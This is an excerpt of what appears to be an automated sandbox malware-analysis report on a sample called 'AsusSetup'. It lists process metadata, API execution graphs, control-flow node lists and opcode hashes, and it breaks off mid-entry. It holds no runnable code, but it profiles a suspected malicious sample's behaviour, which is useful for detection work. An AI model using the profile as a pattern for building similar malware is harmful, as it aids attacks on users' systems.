                                                                                                                                                                                                                                                                                                                                                                                                                  MD5 hash:02A39F6A65834451980F9B1EE3EA62AA
                                                                                                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                                                                                                                                                                                                                                  Start time:11:50:01
                                                                                                                                                                                                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                  File size:1'512'448 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5 hash:8692348A40AAA0C027003BE9DA09E432
                                                                                                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    Execution Coverage:12%
                                                                                                                                                                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:98%
                                                                                                                                                                                                                                                                                                                                                                                                                    Signature Coverage:1.5%
                                                                                                                                                                                                                                                                                                                                                                                                                    Total number of Nodes:202
                                                                                                                                                                                                                                                                                                                                                                                                                    Total number of Limit Nodes:18
                                                                                                                                                                                                                                                                                                                                                                                                                    execution_graph 5772 1fd8db8 5774 1fd8965 5772->5774 5773 1fd9c70 VirtualFree 5775 1fd8977 5773->5775 5774->5773 5774->5775 5802 1fd8b76 5806 1fd89b8 5802->5806 5803 1fd8fab SetFilePointerEx 5803->5806 5808 1fd8977 5803->5808 5804 1fda380 SetFilePointerEx 5804->5806 5805 1fd8b33 WriteFile 5805->5806 5806->5803 5806->5804 5806->5805 5807 1fd8965 5806->5807 5806->5808 5807->5808 5809 1fd9c70 VirtualFree 5807->5809 5809->5808 5651 1fd8931 5652 1fd893c 5651->5652 5653 1fd8977 5652->5653 5655 1fd9c70 5652->5655 5658 1fd9c9b 5655->5658 5656 1fd9d93 VirtualFree 5657 1fd9d97 5656->5657 5657->5653 5658->5656 5814 1fd8b33 WriteFile 5816 1fd89b8 5814->5816 5815 1fd8fab SetFilePointerEx 5815->5816 5819 1fd8977 5815->5819 5816->5814 5816->5815 5817 1fda380 SetFilePointerEx 5816->5817 5818 1fd8965 5816->5818 5816->5819 5817->5816 5818->5819 5820 1fd9c70 VirtualFree 5818->5820 5820->5819 5821 1401cacb4 5824 1401cb8f4 5821->5824 5825 1401cacbd 5824->5825 5826 1401cb917 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 5824->5826 5826->5825 5776 1fd8faa SetFilePointerEx 5778 1fd8977 5776->5778 5779 1fd89b8 5776->5779 5777 1fda380 SetFilePointerEx 5777->5779 5778->5778 5779->5777 5779->5778 5780 1fd8b33 WriteFile 5779->5780 5781 1fd8fab SetFilePointerEx 5779->5781 5782 1fd8965 5779->5782 5780->5779 5781->5778 5781->5779 5782->5778 5783 1fd9c70 VirtualFree 5782->5783 5783->5778 5727 1fd9625 SetFilePointerEx 5729 1fd9512 5727->5729 5728 1fd954a SetFilePointerEx 5728->5729 5729->5728 5730 1fd9529 5729->5730 5731 1fd9648 SetFilePointerEx 5729->5731 5731->5729 5810 1fd8964 5811 1fd8969 5810->5811 5812 1fd9c70 VirtualFree 5811->5812 5813 1fd8977 5812->5813 5732 1fd83e7 5735 1fd81e5 5732->5735 5733 1fd830b CloseHandle 5733->5735 5734 1fd8212 GetTokenInformation 5734->5735 5735->5733 5735->5734 5736 1fd8357 GetTokenInformation 5735->5736 5737 1fd81f7 5735->5737 5736->5735 5790 1fd8ba6 5793 1fd89b8 5790->5793 5791 1fd8b33 WriteFile 5791->5793 5792 1fd8fab SetFilePointerEx 5792->5793 5796 1fd8977 5792->5796 5793->5790 5793->5791 5793->5792 5794 1fda380 SetFilePointerEx 5793->5794 5795 1fd8965 5793->5795 5793->5796 5794->5793 5795->5796 5797 1fd9c70 VirtualFree 5795->5797 5797->5796 5766 1fd81e3 5770 1fd81e5 5766->5770 5767 1fd8357 GetTokenInformation 5767->5770 5768 1fd830b CloseHandle 5768->5770 5769 1fd8212 GetTokenInformation 5769->5770 5770->5767 5770->5768 5770->5769 5771 1fd81f7 5770->5771 5757 1fd8722 5760 1fd86a7 5757->5760 5758 1fdec30 VirtualAlloc 5758->5760 5759 1fd8736 5760->5758 5760->5759 5827 1fd5d22 5828 1fd5cd4 CreateThread CloseHandle 5827->5828 5829 1fd5bbc 5827->5829 5828->5829 5829->5828 5830 1fd5c2c 5829->5830 5831 1fd5d56 CreateThread 5829->5831 5832 1fd5c84 5829->5832 5831->5829 5833 1fd5990 VirtualAlloc 5832->5833 5834 1fd5dcd 5833->5834 5834->5834 5625 1fd92dd 5626 1fd92cc SetFilePointerEx 5625->5626 5627 1fd91d3 5626->5627 5627->5626 5628 1fd9340 5627->5628 5629 1fd61dc 5630 1fd6155 5629->5630 5630->5629 5631 1fd61eb 5630->5631 5632 1fd61f5 VirtualAlloc 5630->5632 5631->5631 5632->5630 5633 1fd621c 5634 1fd6155 5633->5634 5635 1fd61eb 5634->5635 5636 1fd61f5 VirtualAlloc 5634->5636 5635->5635 5636->5634 5637 1fd94de 5639 1fd94ed 5637->5639 5638 1fd9648 SetFilePointerEx 5638->5639 5639->5638 5640 1fd954a SetFilePointerEx 5639->5640 5641 1fd9529 5639->5641 5640->5639 5847 1fd58de 5848 1fe53f0 VirtualAlloc 5847->5848 5849 1fd58f9 5848->5849 5850 1fd81c0 3 API calls 5849->5850 5851 1fd5907 5849->5851 5850->5851 5642 1fd919a ReadFile 5643 1fd91d3 5642->5643 5644 1fd9340 5643->5644 5645 1fd92cc SetFilePointerEx 5643->5645 5645->5643 5646 1fd615a 5647 1fd615c SetFilePointerEx 5646->5647 5650 1fd6155 5647->5650 5648 1fd61eb 5649 1fd61f5 VirtualAlloc 5649->5650 5650->5648 5650->5649 5869 1fd8e1a 5870 1fd8b6f 5869->5870 5871 1fd8f41 SetFilePointerEx 5870->5871 5880 1fd8965 5870->5880 5873 1fd8f17 5871->5873 5874 1fd89b8 5871->5874 5872 1fd8fab SetFilePointerEx 5872->5874 5879 1fd8977 5872->5879 5875 1fd9180 SetFilePointerEx 5873->5875 5876 1fd8f2c 5873->5876 5874->5872 5877 1fd8b33 WriteFile 5874->5877 5878 1fda380 SetFilePointerEx 5874->5878 5874->5879 5874->5880 5875->5876 5877->5874 5878->5874 5880->5879 5881 1fd9c70 VirtualFree 5880->5881 5881->5879 5659 1fd5d50 CreateThread 5666 1fd5bbc 5659->5666 5660 1fd5cd4 CreateThread CloseHandle 5660->5666 5661 1fd5c84 5667 1fd5990 5661->5667 5662 1fd5c2c 5664 1fd5d56 CreateThread 5664->5666 5665 1fd5dcd 5665->5665 5666->5660 5666->5661 5666->5662 5666->5664 5668 1fd5994 _invalid_parameter_noinfo wcscpy 5667->5668 5669 1fd5a23 5668->5669 5670 1fd5a8d VirtualAlloc 5668->5670 5669->5665 5670->5668 5671 1fd92d0 5672 1fd91d3 5671->5672 5673 1fd9340 5672->5673 5674 1fd92cc SetFilePointerEx 5672->5674 5674->5672 5675 1fd8690 5678 1fd8699 5675->5678 5677 1fd8736 5678->5677 5679 1fdec30 5678->5679 5680 1fdec34 5679->5680 5681 1fdeca5 VirtualAlloc 5680->5681 5682 1fdec70 5681->5682 5682->5678 5798 1fd6192 5799 1fd6155 5798->5799 5799->5798 5800 1fd61eb 5799->5800 5801 1fd61f5 VirtualAlloc 5799->5801 5800->5800 5801->5799 5688 1fd5b8f 5699 1fe53f0 5688->5699 5690 1fd5baf 5704 1fd81c0 5690->5704 5692 1fd5c2c 5693 1fd5c84 5694 1fd5990 VirtualAlloc 5693->5694 5695 1fd5dcd 5694->5695 5695->5695 5696 1fd5d56 CreateThread 5698 1fd5bbc 5696->5698 5697 1fd5cd4 CreateThread CloseHandle 5697->5698 5698->5692 5698->5693 5698->5696 5698->5697 5700 1fe53f4 5699->5700 5701 1fe545e VirtualAlloc 5700->5701 5703 1fe53f6 5700->5703 5702 1fe5460 5701->5702 5702->5700 5703->5690 5707 1fd81e5 5704->5707 5705 1fd8357 GetTokenInformation 5705->5707 5706 1fd830b CloseHandle 5706->5707 5707->5698 5707->5705 5707->5706 5708 1fd8212 GetTokenInformation 5707->5708 5709 1fd81f7 5707->5709 5708->5707 5709->5698 5882 1fd620f 5884 1fd6155 5882->5884 5883 1fd61eb 5884->5883 5885 1fd623f 5884->5885 5886 1fd61f5 VirtualAlloc 5884->5886 5885->5885 5886->5884 5710 1fd8a0e 5711 1fd8ee8 SetFilePointerEx 5710->5711 5712 1fd8a16 5710->5712 5713 1fd8a1c 5711->5713 5712->5711 5712->5713 5714 1fd6149 5715 1fd61b5 5714->5715 5720 1fd6155 5714->5720 5716 1fd615c SetFilePointerEx 5715->5716 5717 1fd61cf ReadFile 5715->5717 5716->5720 5717->5720 5719 1fd61eb 5720->5719 5721 1fd61f5 VirtualAlloc 5720->5721 5721->5720 5738 1fd8f40 SetFilePointerEx 5740 1fd8f17 5738->5740 5741 1fd89b8 5738->5741 5739 1fd8fab SetFilePointerEx 5739->5741 5747 1fd8977 5739->5747 5743 1fd8f2c 5740->5743 5753 1fd9180 5740->5753 5741->5739 5744 1fd8b33 WriteFile 5741->5744 5746 1fd8965 5741->5746 5741->5747 5749 1fda380 5741->5749 5744->5741 5746->5747 5748 1fd9c70 VirtualFree 5746->5748 5748->5747 5750 1fda386 5749->5750 5752 1fda3a3 5749->5752 5751 1fda64e SetFilePointerEx 5750->5751 5750->5752 5751->5752 5752->5741 5755 1fd91d3 5753->5755 5754 1fd9340 5754->5743 5755->5754 5756 1fd92cc SetFilePointerEx 5755->5756 5756->5755

                                                                                                                                                                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                                                                                                                                                                    Function 01FD5346 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 908c24f0ecee5e6f2dddf1d8173b17ebe70cd201337ab44e3e024085c5e0ca95
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 4140edc9ed4407511f6d591b39bddada7e71295da6bff5ac8270af6427762992
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 908c24f0ecee5e6f2dddf1d8173b17ebe70cd201337ab44e3e024085c5e0ca95
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B941F293A0D691CFE72A422C58743B17EB39B13262F4D02979587CB1F2E99B48548367
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 01FD81C0 Relevance: 4.9, APIs: 3, Instructions: 375COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 0 1fd81c0-1fd81d8 1 1fd83bf-1fd83ca 0->1 2 1fd81e5 0->2 13 1fd8277-1fd827a 1->13 14 1fd83d0 1->14 3 1fd81eb 2->3 4 1fd82a3-1fd82a5 2->4 8 1fd81f1 3->8 9 1fd82b2-1fd82bc 3->9 5 1fd83f9 4->5 6 1fd82ab 4->6 16 1fd83ff 5->16 17 1fd82d2-1fd82d7 5->17 6->5 10 1fd82b1 6->10 8->9 15 1fd81f7 8->15 11 1fd82c5-1fd82c8 9->11 12 1fd8357-1fd836f GetTokenInformation 9->12 10->9 11->5 18 1fd82ce 11->18 28 1fd8376-1fd837b 12->28 21 1fd827c 13->21 22 1fd8241 13->22 14->13 20 1fd83d6 14->20 23 1fd828e 15->23 31 1fdf524-1fdf52e 16->31 19 1fd8306-1fd8309 17->19 24 1fd828f-1fd8303 call 20072ec 18->24 25 1fd82d0 18->25 26 1fd832e-1fd8330 19->26 27 1fd830b-1fd8311 CloseHandle 19->27 29 1fd83d7-1fd83dd 20->29 21->22 30 1fd827e 21->30 22->28 24->19 53 1fd834f-1fd8355 24->53 25->17 25->24 32 1fd82dd-1fd82e3 26->32 33 1fd8332 26->33 27->26 34 1fd8381 28->34 35 1fd82f0-1fd831c 28->35 29->5 30->27 36 1fd8284 30->36 38 1fdf807 31->38 41 1fd82e9 32->41 42 1fd83a3-1fd83a4 32->42 33->32 43 1fd8334 33->43 34->35 46 1fd8387 34->46 35->2 57 1fd8322 35->57 36->23 36->26 39 1fdf80d 38->39 40 1fdf8df-1fdf8e0 38->40 39->40 48 1fdf813 39->48 51 1fe15a5-1fe15aa 40->51 41->42 49 1fd82ef 41->49 43->31 46->13 55 1fdf78f 48->55 56 1fdf81b 48->56 49->35 58 1fe15ae-1fe15af 51->58 63 1fd8341 53->63 64 1fd8212-1fd821a GetTokenInformation 53->64 55->56 60 1fdf795 55->60 56->40 57->2 61 1fd8328-1fd832c 57->61 62 1fe15b2-1fe15b7 58->62 60->38 61->11 61->26 65 1fe15ba-1fe15c1 62->65 63->64 66 1fd8347 63->66 67 1fd83af 64->67 68 1fd8220-1fd8234 64->68 71 1fe15c7-1fe15d2 65->71 72 1fe1750-1fe1763 call 20072f4 65->72 73 1fd834d 66->73 74 1fe1638-1fe1640 66->74 69 1fd83b5 67->69 70 1fd8251-1fd8256 call 20072f4 67->70 68->29 92 1fd823a 68->92 69->70 78 1fd83bb-1fd83bd 69->78 86 1fd825b-1fd8393 70->86 81 1fe15d4-1fe15d6 71->81 82 1fe1620-1fe1623 71->82 87 1fe1768-1fe17a2 72->87 73->53 76 1fe170e-1fe1727 74->76 77 1fe1646-1fe165f 74->77 76->71 83 1fe172d 76->83 77->71 84 1fe1665 77->84 78->1 88 1fe15dc-1fe15df 81->88 89 1fe1670-1fe1684 81->89 90 1fe1625-1fe1628 82->90 91 1fe16a0-1fe16b4 82->91 83->72 84->72 86->30 106 1fd8399 86->106 88->65 97 1fe15e1-1fe15f6 88->97 89->51 93 1fe168a-1fe168d 89->93 90->65 98 1fe162a-1fe1636 90->98 94 1fe16b6-1fe16b9 91->94 95 1fe16f4-1fe16f5 91->95 92->29 99 1fd8240 92->99 100 1fe172f-1fe1738 93->100 101 1fe1693-1fe1697 93->101 102 1fe173a-1fe173b 94->102 103 1fe16bb 94->103 111 1fe16fe-1fe170c 95->111 104 1fe15fc-1fe1600 97->104 105 1fe16d2-1fe16d7 97->105 98->74 107 1fe16dc-1fe16ec 98->107 109 1feb32e-1feb330 99->109 108 1fe173f-1fe1740 100->108 110 1fe16bf-1fe16cd 101->110 102->108 103->110 104->111 112 1fe1606-1fe1618 104->112 105->58 106->30 114 1fd839f-1fd83a1 106->114 107->71 113 1fe16f2 107->113 117 1fe1744-1fe1748 108->117 115 1feb332-1feb337 call 20072f4 109->115 116 1feb300-1feb302 109->116 111->117 112->62 113->72 114->42 115->116 122 1feb339 115->122 122->116 123 1feb33b-1feb33f 122->123 126 1feb317 123->126 127 1feb305-1feb32d 123->127 126->127 130 1feb2ff 126->130 127->109 130->116
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: c3c2c3ebb38d012564697c7b13eda330ccdc57883374f0f115d01db4afc1a989
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: d677dd05c89b7f786ca0ba246f6b9da6be44daed0d7c7e35bfef289e7c136b93
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3c2c3ebb38d012564697c7b13eda330ccdc57883374f0f115d01db4afc1a989
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4CB1173190CA45CBEB2ACF1D8885679BBE3FF95354F1C8259D88B87166DA379802C352
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 01FD5B8F Relevance: 4.7, APIs: 3, Instructions: 161threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 131 1fd5b8f-1fd5c20 call 1fe53f0 call 2008358 call 1ff0320 call 1fd81c0 141 1fd5cf4-1fd5d08 call 20072ec 131->141 142 1fd5c26 131->142 146 1fd5d0e 141->146 147 1fd5c87-1fd5dc8 call 1fd5e60 call 1fd5990 141->147 142->141 143 1fd5c2c-1fd5c2f 142->143 146->147 149 1fd5d14-1fd5d18 146->149 161 1fd5dcd 147->161 153 1fd5daf-1fd5db6 call 1fd52d0 149->153 154 1fd5c65 149->154 164 1fd5dbc 153->164 165 1fd5c30-1fd5c39 153->165 155 1fd5c67 154->155 156 1fd5ca3 call 1fd5df0 154->156 155->156 159 1fd5c69-1fd5c9d 155->159 170 1fd5c45-1fd5d6d call 1ff1520 156->170 179 1fd5c9f 159->179 180 1fd5c85 159->180 161->161 167 1fd5d7d-1fd5d89 164->167 168 1fd5dbe 164->168 182 1fd5cb9-1fd5cbd 165->182 183 1fd5bf7 165->183 176 1fd5d8b-1fd5d92 167->176 177 1fd5d94 167->177 168->167 178 1fd5d9b 168->178 184 1fd5bfd-1fd5c06 170->184 194 1fd5d73 170->194 176->177 187 1fd5d9c 176->187 177->143 191 1fd5cb3 177->191 178->187 179->180 189 1fd5ca1 179->189 180->147 185 1fd5d56-1fd5d5b CreateThread 182->185 186 1fd5cc3 182->186 183->182 183->184 199 1fd5da5-1fd5da8 184->199 196 1fd5d1f-1fd5d45 185->196 197 1fd5c7e 185->197 186->185 193 1fd5cc9 186->193 187->199 189->156 191->143 191->182 193->185 194->184 198 1fd5d79-1fd5d7b 194->198 202 1fd5cd4-1fd5cea CreateThread CloseHandle 196->202 203 1fd5d47 196->203 197->196 200 1fd5c84 197->200 198->167 199->153 200->180 202->176 205 1fd5cf0-1fd5d4d 202->205 203->202 205->177
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: ce3f9119a031061baa606f21087281148c21c7d9cee102b95e9d1de0711b0121
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 38a3e544e1c6e992fa2c63a2fb77311adc22f47edc70719e980b594e9b57dc31
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce3f9119a031061baa606f21087281148c21c7d9cee102b95e9d1de0711b0121
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DD41D922A0CE09CFEB69973C98687397AF3EB55311F4C036AD507CB1B1DE6784068762
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 01FD5D22 Relevance: 4.5, APIs: 3, Instructions: 42threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 207 1fd5d22-1fd5d45 208 1fd5cd4-1fd5cea CreateThread CloseHandle 207->208 209 1fd5d47 207->209 211 1fd5d8b-1fd5d92 208->211 212 1fd5cf0-1fd5d4d 208->212 209->208 214 1fd5d9c 211->214 215 1fd5d94 211->215 212->215 219 1fd5da5-1fd5db6 call 1fd52d0 214->219 217 1fd5c2c-1fd5c2f 215->217 218 1fd5cb3 215->218 218->217 220 1fd5cb9-1fd5cbd 218->220 230 1fd5dbc 219->230 231 1fd5c30-1fd5c39 219->231 222 1fd5d56-1fd5d5b CreateThread 220->222 223 1fd5cc3 220->223 228 1fd5d1f-1fd5d45 222->228 229 1fd5c7e 222->229 223->222 226 1fd5cc9 223->226 226->222 228->208 228->209 229->228 232 1fd5c84-1fd5dc8 call 1fd5e60 call 1fd5990 229->232 233 1fd5d7d-1fd5d89 230->233 234 1fd5dbe 230->234 231->220 243 1fd5bf7 231->243 250 1fd5dcd 232->250 233->211 233->215 234->233 242 1fd5d9b 234->242 242->214 243->220 244 1fd5bfd-1fd5c06 243->244 244->219 250->250
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CreateThread$CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 738052048-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: eea8b3599f103d4e574ebf5c6b1afbd860f4798a5f425f9dafef797addc356b6
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5FF0F622E1CD05C5EB2E873C886933A75F3A78A121F5C071FC567CA1F0DA2741028265
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 01FD94DE Relevance: 3.2, APIs: 2, Instructions: 160COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 251 1fd94de-1fd94f8 call 20072ec 254 1fd94fe 251->254 255 1fd9648-1fd9656 SetFilePointerEx 251->255 254->255 257 1fd9504-1fd9508 254->257 256 1fd96fd 255->256 258 1fd97c5 256->258 259 1fd9703-1fd9982 256->259 260 1fd95ae-1fd95bf call 1fdebe0 257->260 261 1fd9512-1fd951d 257->261 264 1fd96ef-1fd9759 258->264 265 1fd97cb 258->265 270 1fd9988 259->270 271 1fd9734-1fd9735 259->271 260->258 274 1fd95c5-1fd99db 260->274 262 1fd986d 261->262 263 1fd9523 261->263 277 1fd9874 262->277 263->262 269 1fd9529 263->269 275 1fd959c-1fd95a2 SetFilePointerEx 264->275 276 1fd975f 264->276 265->264 272 1fd97d1 265->272 278 1fe8d17-1fe8d1c 269->278 270->271 279 1fd998e 270->279 280 1fd973e 271->280 272->280 289 1fd99e1 274->289 290 1fd9832-1fd9834 274->290 291 1fd98c5 275->291 276->275 282 1fd9765 276->282 283 1fd987a 277->283 284 1fd9913-1fd99d0 277->284 288 1fd9998-1fd999f 279->288 280->258 286 1fd9776-1fd9783 282->286 283->284 287 1fd9880-1fd9882 283->287 284->288 295 1fd973f-1fd9754 call 1fdea60 286->295 296 1fd9785 286->296 297 1fd9884 287->297 298 1fd99a5 288->298 299 1fd98b4 288->299 289->290 301 1fd99e7-1fd99ed 289->301 290->258 300 1fd9836-1fd983a 290->300 293 1fd985c-1fd985f 291->293 294 1fd98c7-1fd98d0 291->294 307 1fd9847-1fd984f 293->307 308 1fd9861 293->308 302 1fd9968-1fd9970 call 1fdeb00 294->302 303 1fd98d6 294->303 295->277 296->295 304 1fd9787 296->304 298->299 305 1fd99ab 298->305 299->297 306 1fd98b6 299->306 300->286 301->278 302->293 303->302 314 1fd98dc 303->314 320 1fd97b2 304->320 305->302 316 1fd98bc 306->316 317 1fd9718 306->317 307->261 318 1fd9855 307->318 311 1fd9867 308->311 312 1fd9570-1fd9637 call 20072f4 308->312 311->262 311->312 323 1fd963c 312->323 314->314 316->291 317->271 318->320 320->258 323->307 324 1fd9642 323->324 324->255 324->307
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 2e225c41a0938c32b06857d4df1b06a163d03e96ae6c5dbee083fbf99e02f96e
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 19aeead9cf9cc57a85212553ac71f2c3860f09da5432d8476a98ad12d67bacb5
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e225c41a0938c32b06857d4df1b06a163d03e96ae6c5dbee083fbf99e02f96e
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0441E522E0C742CBEB399AEC885167A77D3BBC461CF8D462ED167C2191DAE788018743
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 01FD6149 Relevance: 3.1, APIs: 2, Instructions: 92COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
